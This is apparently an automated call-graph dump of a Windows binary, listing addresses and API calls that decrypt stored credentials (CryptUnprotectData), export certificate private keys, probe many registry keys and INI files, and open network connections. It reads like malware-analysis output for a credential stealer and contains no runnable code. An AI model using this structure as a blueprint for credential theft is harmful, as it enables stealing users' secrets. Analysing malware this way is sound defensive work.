8488 401735 8487->8488 8489 401709 GlobalFix 8487->8489 8488->8456 8490 401719 8489->8490 8492 40174b 8489->8492 8491 401724 GlobalUnWire 8490->8491 8491->8492 8492->8456 8495 401a3f 8493->8495 8494 401add 8494->8458 8495->8494 8496 401a4f GlobalFix 8495->8496 8496->8494 8497 401a5e 8496->8497 8518 4018cf LocalAlloc 8497->8518 8499 401a69 8500 401a7a GlobalUnWire lstrlen 8499->8500 8501 401a9a 8500->8501 8502 4018b8 LocalFree 8501->8502 8502->8494 8513->8472 8514->8474 8516 4018c1 LocalFree 8515->8516 8517 4018a1 8515->8517 8516->8517 8517->8479 8518->8499 8520 401226 ExitProcess 8521 401241 8520->8521 8522 401245 ReadFile 8520->8522 8523 401263 CloseHandle 8522->8523 8524 401271 8522->8524 8524->8522 8525 401289 CloseHandle 8524->8525 12016 40b8e7 12017 40ba2a 12016->12017 12018 4018b8 LocalFree 12017->12018 12019 40ba32 12018->12019 8443 410630 8444 41062f GetTickCount 8443->8444 8446 410642 8443->8446 8444->8443 8447 41064b ExitProcess 8446->8447 12135 40bc36 12136 40bc4d 12135->12136 12137 40bc44 12135->12137 12137->12136 12138 40bcc8 CryptUnprotectData 12137->12138 12138->12136 12139 40bcfb 12138->12139 12139->12136 12140 40bd1f LocalFree 12139->12140 12140->12136 12141 40bd37 12140->12141 12141->12136 12150 4018cf LocalAlloc 12141->12150 12143 40bd53 12144 40bd64 lstrlen StrCmpNIA 12143->12144 12145 40bd80 lstrlen StrCmpNIA 12144->12145 12146 40bd98 12144->12146 12145->12146 12147 40bd9c lstrlen StrCmpNIA 12146->12147 12149 40bdb4 12146->12149 12147->12149 12148 4018b8 LocalFree 12148->12136 12149->12148 12150->12143 8609 40fd78 8619 403ffb WSAStartup 8609->8619 8611 40fe61 8612 40fe4d 8612->8611 8637 4026dd RegCreateKeyA 8612->8637 8615 40fd7d 8615->8611 8615->8612 8616 40fe2c Sleep 8615->8616 8618 40fb14 LocalFree LocalAlloc GlobalFix GlobalUnWire StrStrIA 8615->8618 8620 403f97 8615->8620 8627 401bc0 8615->8627 8616->8615 8618->8615 8619->8615 8621 403fec 8620->8621 8622 403fa6 8620->8622 8621->8615 8622->8621 8623 403fc4 GlobalFix 8622->8623 8623->8621 8624 403fd3 8623->8624 8662 403de5 8624->8662 8629 401bd8 8627->8629 8628 401c7e 8628->8615 8629->8628 8630 401bf5 GlobalFix 8629->8630 8630->8628 8631 401c01 8630->8631 8742 4018cf LocalAlloc 8631->8742 8633 401c0c 8634 401c1d GlobalUnWire 8633->8634 8635 401c36 8634->8635 8636 4018b8 LocalFree 8635->8636 8636->8628 8638 402701 RegSetValueExA 8637->8638 8639 402723 8637->8639 8640 40271a 8638->8640 8641 40271b RegCloseKey 8638->8641 8642 4027f0 8639->8642 8643 40272b GetTempPathA 8639->8643 8640->8641 8641->8639 8642->8611 8643->8642 8644 402744 8643->8644 8644->8642 8645 40274f CreateDirectoryA 8644->8645 8646 402769 8645->8646 8647 402789 8646->8647 8648 40276d 8646->8648 8650 401df8 5 API calls 8647->8650 8743 401df8 8648->8743 8652 402798 ExitProcess 8650->8652 8651 40277e 8748 401e4c 8651->8748 8654 4027d6 8652->8654 8655 4027be 8652->8655 8658 4027e5 8654->8658 8659 4027da DeleteFileA 8654->8659 8657 401422 WriteFile 8655->8657 8660 4027cc CloseHandle 8657->8660 8661 4018b8 LocalFree 8658->8661 8659->8658 8660->8654 8661->8642 8693 4018cf LocalAlloc 8662->8693 8664 403e00 8694 4018cf LocalAlloc 8664->8694 8666 403e0d 8695 4018cf LocalAlloc 8666->8695 8668 403e1a InternetCrackUrlA 8669 403e61 8668->8669 8670 403e67 8668->8670 8669->8670 8671 403e6c InternetCreateUrlA 8669->8671 8673 4018b8 LocalFree 8670->8673 8671->8670 8672 403e91 InternetCrackUrlA 8671->8672 8672->8670 8674 403ed2 8672->8674 8675 403f71 8673->8675 8674->8670 8676 403edd wsprintfA 8674->8676 8677 4018b8 LocalFree 8675->8677 8696 403800 socket 8676->8696 8679 403f79 8677->8679 8681 4018b8 LocalFree 8679->8681 8680 403f05 8680->8670 8685 403f16 lstrlen 8680->8685 8682 403f81 8681->8682 8683 403f8f GlobalUnWire 8682->8683 8684 4018b8 LocalFree 8682->8684 8683->8621 8684->8683 8704 403884 8685->8704 8693->8664 8694->8666 8695->8668 8697 403819 8696->8697 8698 40381b 8696->8698 8697->8680 8701 40384e 8698->8701 8703 40383d 8698->8703 8726 4037c6 inet_addr 8698->8726 8699 403861 connect 8699->8697 8700 403875 closesocket 8699->8700 8700->8697 8701->8700 8703->8699 8703->8700 8727 4037d6 gethostbyname 8726->8727 8728 4037e2 8726->8728 8727->8728 8728->8703 8742->8633 8744 401e02 lstrlen lstrlen 8743->8744 8756 4018cf LocalAlloc 8744->8756 8747 401e31 lstrcpy lstrcat 8747->8651 8749 401e56 lstrlen lstrlen 8748->8749 8757 4018cf LocalAlloc 8749->8757 8752 401e85 lstrcpy lstrcat 8753 401ea2 8752->8753 8754 401eaa 8752->8754 8755 4018b8 LocalFree 8753->8755 8754->8652 8755->8754 8756->8747 8757->8752 8847 40fbbb 8848 40fbc3 8847->8848 8851 40f984 8848->8851 8850 40fbe9 8852 40f997 8851->8852 8853 40f998 GetPEB 8851->8853 8852->8850 8854 40f9ba 8853->8854 8855 40fa88 8854->8855 8938 40240a 8854->8938 8942 40d3be 8854->8942 8964 40c2bb 8854->8964 8968 40e4b7 8854->8968 8972 40c230 8854->8972 8984 40eeae 8854->8984 8990 40aaa8 8854->8990 8996 40dc27 8854->8996 9000 408124 8854->9000 9006 40c823 8854->9006 9037 40a0a2 8854->9037 9050 40d9a1 8854->9050 9060 4069a0 8854->9060 9064 407e20 8854->9064 9070 40f81f 8854->9070 9082 40901f 8854->9082 9090 40c31d 8854->9090 9094 40a21c 8854->9094 9098 40cf9b 8854->9098 9108 40de9b 8854->9108 9114 40e89b 8854->9114 9118 40d796 8854->9118 9122 40a016 8854->9122 9136 406915 8854->9136 9146 404a95 8854->9146 9160 406d14 8854->9160 9164 40f093 8854->9164 9178 40b012 8854->9178 9182 409f8f 8854->9182 9190 40c98a 8854->9190 9200 407589 8854->9200 9206 409f08 8854->9206 9214 40e907 8854->9214 9240 407086 8854->9240 9282 407685 8854->9282 9292 405f04 8854->9292 9298 409e81 8854->9298 9306 407a7f 8854->9306 9326 40e5ff 8854->9326 9330 40c1ff 8854->9330 9334 4045fd 8854->9334 9360 40cb74 8854->9360 9374 40c6f0 8854->9374 9382 40cbee 8854->9382 9386 4055ed 8854->9386 9426 40c2ec 8854->9426 9430 40c769 8854->9430 9438 407e69 8854->9438 9448 406ce3 8854->9448 9452 40df62 8854->9452 9462 406ae0 8854->9462 9466 40735e 8854->9466 9472 40665e 8854->9472 9476 40dbde 8854->9476 9482 4069db 8854->9482 9494 40d35a 8854->9494 9504 40ca59 8854->9504 9527 40a257 8854->9527 9533 407754 8854->9533 9541 407853 8854->9541 9555 407ed1 8854->9555 9559 40e8d1 8854->9559 9563 404c51 8854->9563 9635 408f4f 8854->9635 9647 40e5ce 8854->9647 9651 40c1ce 8854->9651 9655 40c34e 8854->9655 9659 40e0cd 8854->9659 9663 4063cc 8854->9663 9667 40614b 8854->9667 9679 405acb 8854->9679 9713 40504b 8854->9713 9741 409dcb 8854->9741 9756 405cca 8854->9756 9794 40e449 8854->9794 9804 405e49 8854->9804 9812 409d44 8854->9812 9820 40eb43 8854->9820 9828 408c43 8854->9828 9861 4053c3 8854->9861 9888 40a1c2 8854->9888 9898 40f740 8854->9898 8855->8850 8939 402413 8938->8939 8940 40241f 8939->8940 8941 4018b8 LocalFree 8939->8941 8940->8854 8941->8939 8944 40d3d2 8942->8944 8943 40d5af 8943->8854 8944->8943 8945 40d43d CertOpenSystemStoreA 8944->8945 8945->8943 8953 40d457 8945->8953 8946 40d459 CertEnumCertificatesInStore 8947 40d469 CertCloseStore 8946->8947 8946->8953 8947->8943 8949 40d487 lstrcmp 8949->8953 8951 40d4be lstrcmp 8952 40d4d3 CryptAcquireCertificatePrivateKey 8951->8952 8951->8953 8952->8953 8954 40d4f0 CryptGetUserKey 8952->8954 8953->8946 8953->8949 8953->8951 8955 4018b8 LocalFree 8953->8955 9922 4018cf LocalAlloc 8953->9922 8956 40d504 CryptExportKey 8954->8956 8957 40d57c CryptReleaseContext 8954->8957 8955->8953 8958 40d573 CryptDestroyKey 8956->8958 8959 40d51d 8956->8959 8957->8953 8958->8957 9923 4018cf LocalAlloc 8959->9923 8961 40d525 CryptExportKey 8963 40d542 8961->8963 8962 4018b8 LocalFree 8962->8958 8963->8962 8965 40c2cd 8964->8965 9924 40c13d 8965->9924 8969 40e4c9 8968->8969 8970 40c13d 46 API calls 8969->8970 8971 40e4d9 8970->8971 8971->8854 8973 40c242 8972->8973 8974 40c13d 46 API calls 8973->8974 8975 40c252 8974->8975 8976 401d71 6 API calls 8975->8976 8977 40c269 8976->8977 8978 40c2ac 8977->8978 8979 4041a6 41 API calls 8977->8979 8978->8854 8980 40c28a 8979->8980 8981 4041a6 41 API calls 8980->8981 8982 40c2a4 8981->8982 8983 4018b8 LocalFree 8982->8983 8983->8978 8985 40eec0 8984->8985 10205 40eba3 RegOpenKeyA 8985->10205 8988 40eba3 18 API calls 8989 40eee8 8988->8989 8989->8854 8995 40aaba 8990->8995 8994 40ab15 8994->8854 10217 40a875 8995->10217 8997 40dc39 8996->8997 10263 40439c 8997->10263 8999 40dc53 8999->8854 9001 408136 9000->9001 10282 407f0c RegOpenKeyA 9001->10282 9004 407f0c 14 API calls 9005 40815e 9004->9005 9005->8854 9013 40c836 9006->9013 9007 40c844 StrStrIA 9007->9013 9008 40c88b 9009 40439c 46 API calls 9008->9009 9011 40c8a2 9009->9011 9012 401d71 6 API calls 9011->9012 9014 40c8b9 9012->9014 9013->9007 9013->9008 9015 404351 41 API calls 9013->9015 9018 4018b8 LocalFree 9013->9018 10293 40242b 9013->10293 9016 401d71 6 API calls 9014->9016 9015->9013 9017 40c8d3 9016->9017 9019 401d71 6 API calls 9017->9019 9018->9013 9020 40c8ed 9019->9020 9021 401d71 6 API calls 9020->9021 9024 40c909 9021->9024 9022 4018b8 LocalFree 9023 40c962 9022->9023 9025 4018b8 LocalFree 9023->9025 9036 40c94c 9024->9036 10303 4015cb 9024->10303 9026 40c96a 9025->9026 9030 40c936 9032 4015cb lstrlen 9030->9032 9034 40c941 9032->9034 9036->9022 9038 40a0b6 9037->9038 9039 401eb1 7 API calls 9038->9039 9040 40a0c0 9039->9040 9041 404351 41 API calls 9040->9041 9047 40a0dd 9040->9047 9044 40a0d8 9041->9044 9042 40a133 9042->8854 9043 40a0ee StrStrIA 9043->9047 9045 4018b8 LocalFree 9044->9045 9045->9047 9046 40242b 9 API calls 9046->9047 9047->9042 9047->9043 9047->9046 9048 404351 41 API calls 9047->9048 9049 4018b8 LocalFree 9047->9049 9048->9047 9049->9047 9051 40d9b3 9050->9051 10306 40d965 9051->10306 9054 40d965 46 API calls 9055 40d9ca 9054->9055 9056 40d965 46 API calls 9055->9056 9057 40d9d4 9056->9057 9058 40439c 46 API calls 9057->9058 9059 40d9eb 9058->9059 9059->8854 9061 4069b2 9060->9061 9062 40439c 46 API calls 9061->9062 9063 4069cc 9062->9063 9063->8854 9065 407e32 9064->9065 10315 407bba RegOpenKeyA 9065->10315 9068 407bba 14 API calls 9069 407e5a 9068->9069 9069->8854 10326 4015f0 9070->10326 9072 40f834 GetCurrentDirectoryA 10328 409c3c StrStrIA 9072->10328 9075 409c3c 83 API calls 9076 40f88b SetCurrentDirectoryA GetCurrentDirectoryA 9075->9076 9077 409c3c 83 API calls 9076->9077 9078 40f8cf 9077->9078 9079 409c3c 83 API calls 9078->9079 9080 40f8eb SetCurrentDirectoryA 9079->9080 9081 40f902 9080->9081 9081->8854 9083 409031 9082->9083 10542 408fd3 9083->10542 9086 408fd3 46 API calls 9087 409048 9086->9087 9088 408fd3 46 API calls 9087->9088 9089 409052 9088->9089 9089->8854 9091 40c32f 9090->9091 9092 40c13d 46 API calls 9091->9092 9093 40c33f 9092->9093 9093->8854 9095 40a22e 9094->9095 9096 40439c 46 API calls 9095->9096 9097 40a248 9096->9097 9097->8854 9099 40cfad 9098->9099 10553 40ccda 9099->10553 9102 401eb1 7 API calls 9103 40cfbf 9102->9103 9104 40cfe1 9103->9104 9105 4041a6 41 API calls 9103->9105 9104->8854 9106 40cfdc 9105->9106 9107 4018b8 LocalFree 9106->9107 9107->9104 9109 40dead 9108->9109 10573 40dc62 RegOpenKeyA 9109->10573 9112 40dc62 14 API calls 9113 40ded5 9112->9113 9113->8854 9115 40e8ad 9114->9115 10584 40e85d 9115->10584 9117 40e8c2 9117->8854 9119 40d7a8 9118->9119 10607 40d5c0 RegOpenKeyA 9119->10607 9121 40d7b8 9121->8854 9123 40a028 9122->9123 9124 401d71 6 API calls 9123->9124 9125 40a042 9124->9125 9126 40a05f 9125->9126 9128 404351 41 API calls 9125->9128 9127 401d71 6 API calls 9126->9127 9129 40a076 9127->9129 9130 40a05a 9128->9130 9131 40a093 9129->9131 9133 404351 41 API calls 9129->9133 9132 4018b8 LocalFree 9130->9132 9131->8854 9132->9126 9134 40a08e 9133->9134 9135 4018b8 LocalFree 9134->9135 9135->9131 9137 406927 9136->9137 9138 40439c 46 API calls 9137->9138 9139 406941 9138->9139 9140 401d71 6 API calls 9139->9140 9143 40695a 9140->9143 9141 406984 10618 40668f RegOpenKeyA 9141->10618 9143->9141 9145 4018b8 LocalFree 9143->9145 9144 406991 9144->8854 9145->9141 9147 404aa7 9146->9147 10636 40491b RegOpenKeyA 9147->10636 9150 40491b 14 API calls 9151 404ac4 9150->9151 9152 40491b 14 API calls 9151->9152 9153 404ad1 9152->9153 10647 40480d RegOpenKeyA 9153->10647 9156 40480d 10 API calls 9157 404aeb 9156->9157 9158 40480d 10 API calls 9157->9158 9159 404af8 9158->9159 9159->8854 9161 406d26 9160->9161 9162 40439c 46 API calls 9161->9162 9163 406d40 9162->9163 9163->8854 9165 40f0a5 9164->9165 9166 40439c 46 API calls 9165->9166 9167 40f0bf 9166->9167 9168 40439c 46 API calls 9167->9168 9169 40f0d6 9168->9169 9170 40439c 46 API calls 9169->9170 9171 40f0ed 9170->9171 9172 40439c 46 API calls 9171->9172 9173 40f104 9172->9173 10656 40ef6c 9173->10656 9179 40b024 9178->9179 10697 40aed7 RegOpenKeyA 9179->10697 9181 40b034 9181->8854 9183 4015f0 9182->9183 9184 409fa4 GetCurrentDirectoryA 9183->9184 9185 409c3c 83 API calls 9184->9185 9186 409fdf 9185->9186 9187 409c3c 83 API calls 9186->9187 9188 409ffb SetCurrentDirectoryA 9187->9188 9189 40a012 9188->9189 9189->8854 9191 40c99c 9190->9191 9192 401d71 6 API calls 9191->9192 9193 40c9b2 9192->9193 9194 40c9d9 9193->9194 9195 40242b 9 API calls 9193->9195 9194->8854 9196 40c9bc 9195->9196 9196->9194 9197 404351 41 API calls 9196->9197 9198 40c9d4 9197->9198 9199 4018b8 LocalFree 9198->9199 9199->9194 9201 40759b 9200->9201 10785 4073a7 RegOpenKeyA 9201->10785 9204 4073a7 14 API calls 9205 4075c3 9204->9205 9205->8854 9207 4015f0 9206->9207 9208 409f1d GetCurrentDirectoryA 9207->9208 9209 409c3c 83 API calls 9208->9209 9210 409f58 9209->9210 9211 409c3c 83 API calls 9210->9211 9212 409f74 SetCurrentDirectoryA 9211->9212 9213 409f8b 9212->9213 9213->8854 9215 40e919 9214->9215 9216 401d71 6 API calls 9215->9216 9217 40e933 9216->9217 9218 40e950 9217->9218 9219 404351 41 API calls 9217->9219 9220 401d71 6 API calls 9218->9220 9221 40e94b 9219->9221 9222 40e966 9220->9222 9224 4018b8 LocalFree 9221->9224 9223 40e983 9222->9223 9225 404351 41 API calls 9222->9225 9226 401d71 6 API calls 9223->9226 9224->9218 9227 40e97e 9225->9227 9228 40e99a 9226->9228 9229 4018b8 LocalFree 9227->9229 9230 40e9b7 9228->9230 9231 404351 41 API calls 9228->9231 9229->9223 9232 401d71 6 API calls 9230->9232 9233 40e9b2 9231->9233 9234 40e9cd 9232->9234 9235 4018b8 LocalFree 9233->9235 9236 40e9ea 9234->9236 9237 404351 41 API calls 9234->9237 9235->9230 9236->8854 9238 40e9e5 9237->9238 9239 4018b8 LocalFree 9238->9239 9239->9236 9241 407098 9240->9241 10796 406d4f RegOpenKeyA 9241->10796 9244 401d71 6 API calls 9245 4070bf 9244->9245 9246 4070dd 9245->9246 9247 401e4c 6 API calls 9245->9247 9248 401eb1 7 API calls 9246->9248 9249 4070ce 9247->9249 9250 4070e4 9248->9250 9251 406fbb 20 API calls 9249->9251 9252 40710d 9250->9252 9255 401e4c 6 API calls 9250->9255 9254 4070d8 9251->9254 9253 401eb1 7 API calls 9252->9253 9256 407114 9253->9256 9257 4018b8 LocalFree 9254->9257 9258 4070f3 9255->9258 9259 40713d 9256->9259 9261 401e4c 6 API calls 9256->9261 9257->9246 9260 401e4c 6 API calls 9258->9260 9262 401eb1 7 API calls 9259->9262 9263 4070fe 9260->9263 9264 407123 9261->9264 9266 407144 9262->9266 10807 406fbb 9263->10807 9269 401e4c 6 API calls 9264->9269 9267 40716d 9266->9267 9270 401e4c 6 API calls 9266->9270 9267->8854 9268 407108 9272 40712e 9269->9272 9273 407153 9270->9273 9274 406fbb 20 API calls 9272->9274 9275 401e4c 6 API calls 9273->9275 9276 407138 9274->9276 9283 407697 9282->9283 10833 4075d2 RegOpenKeyA 9283->10833 9286 4075d2 9 API calls 9287 4076bf 9286->9287 9288 4075d2 9 API calls 9287->9288 9289 4076d2 9288->9289 9290 4075d2 9 API calls 9289->9290 9291 4076e4 9290->9291 9291->8854 9293 405f16 9292->9293 10841 405e8b 9293->10841 9296 405e8b 46 API calls 9297 405f3d 9296->9297 9297->8854 9299 4015f0 9298->9299 9300 409e96 GetCurrentDirectoryA 9299->9300 9301 409c3c 83 API calls 9300->9301 9302 409ed1 9301->9302 9303 409c3c 83 API calls 9302->9303 9304 409eed SetCurrentDirectoryA 9303->9304 9305 409f04 9304->9305 9305->8854 9316 407a93 9306->9316 9307 407b66 10856 407a33 9307->10856 9308 407aab StrStrA 9310 407b08 StrStrIA 9308->9310 9308->9316 9310->9316 9311 407ac4 lstrlen 9313 40242b 9 API calls 9311->9313 9313->9316 9314 407a33 46 API calls 9317 407b7a 9314->9317 9315 40242b 9 API calls 9315->9316 9316->9307 9316->9308 9316->9311 9316->9315 9320 404351 41 API calls 9316->9320 9323 4018b8 LocalFree 9316->9323 9318 407a33 46 API calls 9317->9318 9319 407b84 9318->9319 10867 4078c8 RegOpenKeyA 9319->10867 9320->9316 9323->9316 9324 4078c8 48 API calls 9325 407ba9 9324->9325 9325->8854 9327 40e611 9326->9327 9328 40439c 46 API calls 9327->9328 9329 40e62b 9328->9329 9329->8854 9331 40c211 9330->9331 9332 40c13d 46 API calls 9331->9332 9333 40c221 9332->9333 9333->8854 9335 404614 9334->9335 9336 404635 GetVersionExA 9335->9336 9337 404657 9336->9337 10878 40446a GetModuleHandleA 9337->10878 9339 40469d 10884 4018cf LocalAlloc 9339->10884 9341 4046b0 GetLocaleInfoA 10885 40159f 9341->10885 9343 4046df GetLocaleInfoA 9344 404708 9343->9344 10887 4044d2 9344->10887 9346 40470d 10895 40456c 9346->10895 9361 40cb86 9360->9361 9362 401d71 6 API calls 9361->9362 9363 40cb9c 9362->9363 9364 40cba0 StrStrIA 9363->9364 9365 40cbdf 9363->9365 9366 40cbb4 9364->9366 9367 40cbd7 9364->9367 9365->8854 9368 40242b 9 API calls 9366->9368 9369 4018b8 LocalFree 9367->9369 9370 40cbbc 9368->9370 9369->9365 9371 4041a6 41 API calls 9370->9371 9372 40cbd2 9371->9372 9373 4018b8 LocalFree 9372->9373 9373->9367 9375 40c702 9374->9375 10925 40c67f 9375->10925 9378 40c67f 46 API calls 9379 40c719 9378->9379 9380 40c67f 46 API calls 9379->9380 9381 40c723 9380->9381 9381->8854 9383 40cc00 9382->9383 9384 40439c 46 API calls 9383->9384 9385 40cc1a 9384->9385 9385->8854 9387 4055ff 9386->9387 10942 4054c8 9387->10942 9390 4054c8 24 API calls 9391 405632 9390->9391 9392 4054c8 24 API calls 9391->9392 9393 40564a 9392->9393 9394 4054c8 24 API calls 9393->9394 9395 405662 9394->9395 9396 4054c8 24 API calls 9395->9396 9397 40567a 9396->9397 9398 4054c8 24 API calls 9397->9398 9399 405692 9398->9399 9400 4054c8 24 API calls 9399->9400 9401 4056aa 9400->9401 9427 40c2fe 9426->9427 9428 40c13d 46 API calls 9427->9428 9429 40c30e 9428->9429 9429->8854 9431 40c77b 9430->9431 10989 40c732 9431->10989 9434 40c732 46 API calls 9435 40c792 9434->9435 9436 40c732 46 API calls 9435->9436 9437 40c79c 9436->9437 9437->8854 9439 4015f0 9438->9439 9440 407e7e GetWindowsDirectoryA 9439->9440 9441 407e96 9440->9441 9442 407ec2 9440->9442 9441->9442 9443 401df8 5 API calls 9441->9443 9442->8854 9444 407eae 9443->9444 9445 40406c 16 API calls 9444->9445 9446 407ebd 9445->9446 9447 4018b8 LocalFree 9446->9447 9447->9442 9449 406cf5 9448->9449 10998 406b1b RegOpenKeyA 9449->10998 9451 406d05 9451->8854 9453 40df74 9452->9453 9454 401d71 6 API calls 9453->9454 9455 40df8e 9454->9455 9456 40dfab 9455->9456 9457 404351 41 API calls 9455->9457 9458 40439c 46 API calls 9456->9458 9459 40dfa6 9457->9459 9461 40dfc2 9458->9461 9460 4018b8 LocalFree 9459->9460 9460->9456 9461->8854 9463 406af2 9462->9463 9464 40439c 46 API calls 9463->9464 9465 406b0c 9464->9465 9465->8854 9467 407370 9466->9467 11008 40717c RegOpenKeyA 9467->11008 9470 40717c 14 API calls 9471 407398 9470->9471 9471->8854 9473 406670 9472->9473 11019 4063fd RegOpenKeyA 9473->11019 9475 406680 9475->8854 9477 40dbf0 9476->9477 11030 40d9fa RegOpenKeyA 9477->11030 9480 40d9fa 14 API calls 9481 40dc18 9480->9481 9481->8854 9483 4069ed 9482->9483 9484 40439c 46 API calls 9483->9484 9485 406a0e 9484->9485 9486 401d71 6 API calls 9485->9486 9487 406a25 9486->9487 9488 401e4c 6 API calls 9487->9488 9489 406a4d 9487->9489 9490 406a34 9488->9490 9489->8854 9491 404351 41 API calls 9490->9491 9492 406a48 9491->9492 9493 4018b8 LocalFree 9492->9493 9493->9489 9495 40d36c 9494->9495 11041 40d072 RegOpenKeyA 9495->11041 9498 40d072 16 API calls 9499 40d394 9498->9499 11053 40d2cb 9499->11053 9502 40d2cb 21 API calls 9503 40d3af 9502->9503 9503->8854 9512 40ca6c 9504->9512 9505 40caba 9507 401eb1 7 API calls 9505->9507 9506 40ca7a StrStrIA 9506->9512 9508 40cac1 9507->9508 9510 40cae9 9508->9510 9513 401e4c 6 API calls 9508->9513 9509 40242b 9 API calls 9509->9512 9511 401eb1 7 API calls 9510->9511 9514 40caf0 9511->9514 9512->9505 9512->9506 9512->9509 9515 404351 41 API calls 9512->9515 9520 4018b8 LocalFree 9512->9520 9516 40cad0 9513->9516 9517 40cb18 9514->9517 9519 401e4c 6 API calls 9514->9519 9515->9512 9518 404351 41 API calls 9516->9518 9517->8854 9521 40cae4 9518->9521 9522 40caff 9519->9522 9520->9512 9523 4018b8 LocalFree 9521->9523 9524 404351 41 API calls 9522->9524 9523->9510 9525 40cb13 9524->9525 9526 4018b8 LocalFree 9525->9526 9526->9517 9528 40a269 9527->9528 9529 40439c 46 API calls 9528->9529 9530 40a283 9529->9530 9531 40439c 46 API calls 9530->9531 9532 40a29a 9531->9532 9532->8854 9534 407766 9533->9534 11063 4076f3 9534->11063 9537 4076f3 46 API calls 9538 40777d 9537->9538 9539 4076f3 46 API calls 9538->9539 9540 407787 9539->9540 9540->8854 9542 407865 9541->9542 11076 407796 9542->11076 9545 407796 29 API calls 9546 407880 9545->9546 9547 407796 29 API calls 9546->9547 9548 40788c 9547->9548 9549 407796 29 API calls 9548->9549 9550 40789b 9549->9550 9551 407796 29 API calls 9550->9551 9552 4078aa 9551->9552 9553 407796 29 API calls 9552->9553 9554 4078b9 9553->9554 9554->8854 9556 407ee3 9555->9556 9557 40439c 46 API calls 9556->9557 9558 407efd 9557->9558 9558->8854 9560 40e8e3 9559->9560 9561 40e85d 46 API calls 9560->9561 9562 40e8f8 9561->9562 9562->8854 9564 404c63 9563->9564 11107 4018cf LocalAlloc 9564->11107 9566 404c70 GetWindowsDirectoryA 9567 404c84 9566->9567 9568 404c98 9566->9568 9567->9568 9570 404c8b 9567->9570 9569 4018b8 LocalFree 9568->9569 9571 404c96 9569->9571 11108 404b1e 9570->11108 9573 401eb1 7 API calls 9571->9573 9574 404ca7 9573->9574 9575 404b1e 28 API calls 9574->9575 9576 404cb0 9575->9576 9577 401eb1 7 API calls 9576->9577 9578 404cb7 9577->9578 9579 404ccf 9578->9579 9580 401e4c 6 API calls 9578->9580 9581 401eb1 7 API calls 9579->9581 9583 404cc6 9580->9583 9582 404cd6 9581->9582 9584 404cee 9582->9584 9586 401e4c 6 API calls 9582->9586 9585 404b1e 28 API calls 9583->9585 9587 401eb1 7 API calls 9584->9587 9585->9579 9588 404ce5 9586->9588 9636 408f61 9635->9636 9637 40439c 46 API calls 9636->9637 9638 408f7b 9637->9638 11163 408d1e RegOpenKeyA 9638->11163 9641 408d1e 14 API calls 9642 408fa0 9641->9642 11174 408e0d RegOpenKeyA 9642->11174 9645 408e0d 53 API calls 9646 408fc4 9645->9646 9646->8854 9648 40e5e0 9647->9648 11193 40e566 9648->11193 9650 40e5f0 9650->8854 9652 40c1e0 9651->9652 9653 40c13d 46 API calls 9652->9653 9654 40c1f0 9653->9654 9654->8854 9656 40c360 9655->9656 9657 40c13d 46 API calls 9656->9657 9658 40c370 9657->9658 9658->8854 9660 40e0df 9659->9660 9661 40c13d 46 API calls 9660->9661 9662 40e0ef 9661->9662 9662->8854 9664 4063de 9663->9664 11205 4061e4 RegOpenKeyA 9664->11205 9666 4063ee 9666->8854 9668 40615d 9667->9668 9669 401d71 6 API calls 9668->9669 9671 406179 9669->9671 9670 406194 9672 401d71 6 API calls 9670->9672 9671->9670 9673 4018b8 LocalFree 9671->9673 9676 4061ad 9672->9676 9673->9670 9674 4061c8 11216 405f4c RegOpenKeyA 9674->11216 9676->9674 9678 4018b8 LocalFree 9676->9678 9677 4061d5 9677->8854 9678->9674 9680 405add 9679->9680 11226 4059a4 9680->11226 9714 4015f0 9713->9714 9715 405060 GetWindowsDirectoryA 9714->9715 9716 40507c 9715->9716 9717 40511f 9715->9717 9716->9717 9719 401df8 5 API calls 9716->9719 9718 401eb1 7 API calls 9717->9718 9720 405126 9718->9720 9722 405098 GetPrivateProfileStringA 9719->9722 9721 405146 9720->9721 9723 401e4c 6 API calls 9720->9723 11334 404fff 9721->11334 9724 4050c8 9722->9724 9725 4050d9 GetPrivateProfileStringA 9722->9725 9727 405135 9723->9727 9728 404e73 31 API calls 9724->9728 9730 405103 9725->9730 9731 405114 9725->9731 11306 404e73 9727->11306 9728->9725 9734 404e73 31 API calls 9730->9734 9735 4018b8 LocalFree 9731->9735 9733 404fff 36 API calls 9737 405164 9733->9737 9734->9731 9735->9717 9739 404fff 36 API calls 9737->9739 9738 4018b8 LocalFree 9738->9721 9740 405173 9739->9740 9740->8854 9742 409de0 9741->9742 9743 401eb1 7 API calls 9742->9743 9745 409dea 9743->9745 9744 409e12 GetCurrentDirectoryA 9747 409c3c 83 API calls 9744->9747 9745->9744 9746 401e4c 6 API calls 9745->9746 9749 409df9 9746->9749 9748 409e4a 9747->9748 9750 409c3c 83 API calls 9748->9750 9751 404351 41 API calls 9749->9751 9752 409e66 SetCurrentDirectoryA 9750->9752 9753 409e0d 9751->9753 9754 409e7d 9752->9754 9755 4018b8 LocalFree 9753->9755 9754->8854 9755->9744 9757 405cdc 9756->9757 9758 401d71 6 API calls 9757->9758 9759 405cf6 9758->9759 9760 405d0e 9759->9760 9761 40406c 16 API calls 9759->9761 9762 401d71 6 API calls 9760->9762 9763 405d09 9761->9763 9764 405d25 9762->9764 9765 4018b8 LocalFree 9763->9765 9766 405d3d 9764->9766 9767 40406c 16 API calls 9764->9767 9765->9760 9768 401d71 6 API calls 9766->9768 9769 405d38 9767->9769 9770 405d54 9768->9770 9771 4018b8 LocalFree 9769->9771 9772 405d67 9770->9772 11357 405c6c 9770->11357 9771->9766 9774 401d71 6 API calls 9772->9774 9776 405d7e 9774->9776 9778 405d91 9776->9778 9779 405c6c 41 API calls 9776->9779 9777 4018b8 LocalFree 9777->9772 9780 401d71 6 API calls 9778->9780 9781 405d8c 9779->9781 9782 405da8 9780->9782 9783 4018b8 LocalFree 9781->9783 9784 405dbb 9782->9784 9786 405c6c 41 API calls 9782->9786 9783->9778 11348 405c9d 9784->11348 9788 405db6 9786->9788 9795 40e45b 9794->9795 11362 40e237 RegOpenKeyA 9795->11362 9798 40e237 11 API calls 9799 40e483 9798->9799 11395 40e380 RegOpenKeyA 9799->11395 9802 40e380 31 API calls 9803 40e4a8 9802->9803 9803->8854 9805 405e5b 9804->9805 11426 405de8 9805->11426 9808 405de8 46 API calls 9809 405e72 9808->9809 9810 405de8 46 API calls 9809->9810 9811 405e7c 9810->9811 9811->8854 9813 4015f0 9812->9813 9814 409d59 GetCurrentDirectoryA 9813->9814 9815 409c3c 83 API calls 9814->9815 9816 409d94 9815->9816 9817 409c3c 83 API calls 9816->9817 9818 409db0 SetCurrentDirectoryA 9817->9818 9819 409dc7 9818->9819 9819->8854 9821 40eb55 9820->9821 11439 40e9f9 9821->11439 9824 40e9f9 49 API calls 9825 40eb7d 9824->9825 9826 40439c 46 API calls 